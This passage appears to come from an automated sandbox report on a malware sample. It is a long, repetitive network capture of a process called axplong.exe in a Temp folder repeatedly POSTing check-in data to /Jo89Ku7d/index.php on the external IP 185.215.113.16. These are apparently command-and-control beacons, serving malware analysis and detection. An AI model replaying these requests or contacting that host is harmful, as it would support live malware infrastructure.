                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:34.419847012 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.449763185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:34.529567957 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:35.231143951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:35.231950045 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:35.455610991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.449764185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:35.576035023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:36.282371044 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:36.283191919 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:36.507232904 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.449765185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:36.622483015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:37.391284943 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:37.392347097 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:37.619554996 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.449766185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:37.834933996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:38.497754097 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:38.499655008 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:38.722179890 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.449767185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:38.847228050 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:39.568128109 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:39.569406986 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:39.797302008 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.449768185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:39.922194004 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:40.644069910 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:40.645016909 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:40.886981010 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.449769185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:40.997072935 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:41.704528093 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:41.705478907 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:41.931463003 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.449770185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:42.044126034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:42.802140951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:42.803000927 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:43.035356998 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.449771185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:43.153419018 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:43.863245010 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:43.864145994 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:44.096822977 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.449772185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:44.215781927 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:45.382936001 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:45.383049011 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:45.383140087 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:45.384099007 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:45.813618898 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.449773185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:45.934837103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:46.674652100 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:46.682538986 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:46.915173054 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.449774185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:47.320979118 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
